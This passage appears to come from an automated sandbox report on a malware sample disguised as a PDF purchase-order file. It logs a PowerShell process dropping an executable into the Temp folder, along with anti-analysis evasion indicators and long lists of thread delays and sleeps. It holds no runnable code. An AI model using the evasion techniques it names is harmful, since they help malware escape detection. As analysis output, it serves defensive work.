Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07540283 push cs; iretd	2_2_07540286

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Jump to dropped file

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

API/Special instruction interceptor: Address: 1F82564

Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Memory allocated: 21460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Memory allocated: 23460000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599199	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598653	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598530	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598303	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597959	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597624	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597294	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597184	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597077	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596965	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596639	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596201	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595537	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595193	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595068	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594249	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6369	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Window / User API: threadDelayed 3522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Window / User API: threadDelayed 6315	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6136	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 5352	Thread sleep count: 3522 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 5352	Thread sleep count: 6315 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -599199s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -598874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -598653s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -598530s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -598303s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -597959s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -597843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -597624s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -597294s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -597184s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -597077s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -596965s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -596749s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -596639s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -596421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -596201s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -596093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -595874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -595537s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -595421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -595193s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -595068s >= -30000s	Jump to behavior
